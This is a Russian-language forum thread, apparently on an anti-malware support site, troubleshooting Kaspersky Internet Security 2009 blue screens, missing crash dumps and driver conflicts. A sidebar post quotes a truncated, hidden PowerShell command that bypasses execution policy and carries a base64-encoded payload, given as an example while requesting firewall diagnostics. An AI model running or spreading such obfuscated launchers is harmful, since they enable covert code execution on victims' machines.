Перейти к содержанию

Recommended Posts

Umnik
кис падает в бсод

Есть желание попробовать разобраться с проблемой?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
Есть желание попробовать разобраться с проблемой?

Практически тот же самый bsod, но только на kis2009.

У меня своп не на загрузочном разделе, поэтому дампов нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Можно хотябы отчет GSI?

Хотя без дампов, конечно, плохо. :( Я багу не смогу завести.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
Хотя без дампов, конечно, плохо. :( Я багу не смогу завести.

Не так часто вожусь с домашним компом и ... с дампами я прогнал: своп на загрузочном и дамп просто не создаётся. Система грузится с параметром /sos и хорошо видно, что bsod происходит на том самом моменте, когда должна запускаться проверка дисков autochk.exe. Может дело в том, что драйвер kl1.sys не особо дружит с Matrix Storage Manager, а винт работает в режиме achi, поэтому и наступает тоталкапец без дампов?..

Решил поставить посвежее версию - 8.0.0.506. Теперь у меня это:

kisroot.gif

post-4003-1231193063_thumb.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

dr_dizel

Выполните, пожалуйста, пункты 4. б и 5.

Отредактировал Umnik

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Umnik dr_dizel Для сведения.

А меня на одном ПК в ноябре-декабре тоже KAV2009 стал сильно доставать, систему начисто до этого переставлял - не поправилось, а начиналось всё с зависами при обновлении, потом веб-страницы долго открывались. С прогами конфликта точно не было - после переустановки даже не стал ничего кроме офиса ставить.

Я прям ежедневно с ним мучился, также процессы просматривал, переустанавливал антивирус, потом просто удалил KAV, и поставил на тот ПК паучка - теперь нормально. Сам удивляюсь!

Наверное, есть какая-то несовместимость с мат.платой или драйверами. Umnik Помнишь, я тебе весной проблемы с памятью описывал? Исправились тоже также. Например, у нового дисковода сейчас тоже есть проблемы с записью дисков - на другой плате не было (ошибка с калибровкой мощности). Ставил позавчера на другой ПК - там пишется нормально. Отдам, наверное, кому-то плату или дисковод.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Андрей-001

Потому сначала проверяем все софтовые проблемы. С железкой-то особо не подружишь.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
Выполните, пожалуйста, пункты...

После обновления и перезагрузки кис перестал симулировать руткит. :rolleyes:

Что касается bsod-ов, то они начинались где-то после месяца работы на компе киса. Накакое другое защитное ПО за всю историю компа не вызывало таких глюков.

Вот поставил новый кис и жду, так что я думаю - логии пока бесполезны. Но раз уж просили, то держите.

rep.rar

rep.rar

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

dr_dizel

1. Перемести из слабых ограничений файлы в Доверенные. Вообще, они сами должны были переехать. Видимо в момент запуска КИС не достучался до сервера. Главное, что системные попали куда надо.

2. GSI, как и ожидалось, несовместимостей не выявил. Спросил только, что за файл такой intype.exe.

В общем, до реального дампа...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
Спросил только, что за файл такой intype.exe.

Это редактор небольшой.

В общем, до реального дампа...

Чую, что копать надо в сторону совместимости с iaStor.sys.

P.S. У меня ещё установлены в 1 @Memory Management:

EnforceWriteProtection

DisablePagingExecutive

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
sl1

После обновления и перезагрузки кис перестал симулировать руткит. :rolleyes:
Похоже, что вы до этого CureIt запускали :rolleyes:.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
В общем, до реального дампа...

Агггрррр....

Снова bsod! И написано что дамп сделан, но его нет. Для убеждения в этом можно было даже и ресета не жать т.к. обычно при сохранении можно увидеть бегущие проценты. И в эвентлогах тоже ничего.

Я даже специально сейчас проверил - сделал принудительный дами по Ctrl+ScrollLock+ ScrollLock. Кернелдамп и минидампы сделались и в логии всё записалось.

Что же делать? Может у киса есть какой режим отладочный, а?

bsod.jpg

post-4003-1231353208_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

dr_dizel

Можно снимать логи. Но без дампа это ерунда...

Дай хотя бы кернел... Сколько у тебя РАМы и сколько своп?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
Похоже, что вы до этого CureIt запускали :rolleyes:.

Похоже на то. Куреит победил кис. :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

КуреИТ в Доверенные попадает у КИС по ЭЦП ;)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
Дай хотя бы кернел... Сколько у тебя РАМы и сколько своп?

Я же писал, что дампов именно падения kl1 не формируется. Любого другого - да, но не киса.

Памяти 2 гига, а своп 4 гига.

КуреИТ в Доверенные попадает у КИС по ЭЦП ;)

Это понятно. ;)

Правда файлов в темпе уже нет и процесса такого никто не видит. Эт куреит так замаскировался?

У них просто любовь такая. Хоть у киса куреит и в доверенных, но файлики врозь. :lol:

cur.gif

post-4003-1231356213_thumb.png

Отредактировал dr_dizel

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Это в 5-ке так началось. 4-ка целиком доверенная была, в 5-ке только то, что подписано и успело распаковаться :)

Я же писал, что дампов именно падения kl1 не формируется. Любого другого - да, но не киса.

А зачем тебя, как потенциального клиента, это должно смущать? Я прошу дампы какие есть, кроме совершенно бесполезного мини. Не знаю, как кернел примут.

А вот и гвоздь:

Параметр Полный дамп памяти недоступен на компьютерах, на которых установлена 32-битная операционная система и 2 или более гигабайта (ГБ) оперативной памяти. Дополнительные сведения см. в следующей статье базы знаний Майкрософт:

274598 (http://support.microsoft.com/kb/274598/ ) Полный дамп памяти недоступен на компьютерах, на которых установлено 2 или более гигабайта оперативной памяти (Эта ссылка может указы

В общем, можешь на время воспроизведения либо выдернуть планку(-и), либо поправить boot.ini, поставив туда число поменьше?

boot.PNG

post-3736-1231357856_thumb.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
Это в 5-ке так началось. 4-ка целиком доверенная была, в 5-ке только то, что подписано и успело распаковаться :)

Малацца. :)

А почему у kl1.sys номер версии не 8, а 6? Драйвер не изменялся? Может какого ответственного программера уволили, а он сюрприз там оставил для потомков, что даже дампы не позволяет делать, чтоб остальные разработчики постигли путь дао? ;)

А зачем тебя, как потенциального клиента, это должно смущать? Я прошу дампы какие есть, кроме совершенно бесполезного мини. Не знаю, как кернел примут.

Чёт не особо понимаю в смысле дампа, который создавался для собственно проверки создаваемости дампов... :blink:

http://support.microsoft.com/kb/244139

Проверка прошла успешно.

А вот и гвоздь:

В общем, можешь на время воспроизведения либо выдернуть планку(-и), либо поправить boot.ini, поставив туда число поменьше?

Так у меня стоит дамп ядра, а не полный дамп т.е. этот kb мне не поможет. Да и проверка показала, что дампы формироваться могут.

Пока натравил на kl1 верифаер, может он как-то повлияет на поведение в создании дампов.

Думаю, что отваливание дампов может быть из-за краша в цепочке работы с диском т.е. где-то около iaStor.sys. :rolleyes:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Мммм. Я тебя не так понял в прошлый раз, значит. Эта функция тоже полезна, но не сейчас.

Так у меня стоит дамп ядра, а не полный дамп т.е. этот kb мне не поможет. Да и проверка показала, что дампы формироваться могут.

Проверка показала, что дамп памяти ядра у тебя создается. А если ты выполнишь мою просьбу и попробуешь получить полный дамп?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×